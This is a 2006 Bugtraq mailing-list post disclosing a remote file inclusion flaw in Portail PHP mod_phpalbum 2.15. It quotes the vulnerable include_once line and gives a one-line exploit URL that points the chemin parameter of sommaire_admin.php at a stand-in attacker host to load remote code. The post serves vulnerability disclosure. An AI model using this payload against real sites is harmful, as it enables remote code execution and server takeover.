Portail PHP mod_phpalbum 2.15 Modules Remote File Inclusion

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Portail PHP mod_phpalbum 2.15 Modules Remote File Inclusion
From: x0r0n@xxxxxxxxxxx
Date: 29 Aug 2006 18:03:15 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

############################################################

#Portail PHP mod_phpalbum 2.15  Modules Remote File Inclusion
Vulnerabilities

############################################################

#Author: XORON

############################################################

#Class: Remote

############################################################

#cont@ct: x0r0n[at]hotmail[dot]com

############################################################

#Code:  include_once ($chemin."conf/code.php")

############################################################

#Exploit:
http://www.site.com/[path]/mod_phpalbum/sommaire_admin.php?chemin=http://evil_scripts?

############################################################

#Greetz: str0ke, Ironfist, Preddy, SHiKaA

############################################################

orj. adv: http://www.milw0rm.com/exploits/2271

Prev by Date: DUpoll 3.1 security alert
Next by Date: Re: Jupiter CMS 1.1.5 index.php Remote File Include
Previous by thread: DUpoll 3.1 security alert
Next by thread: InfoSec Paper: Creating Business Through Virtual Trust
Index(es):
- Date
- Thread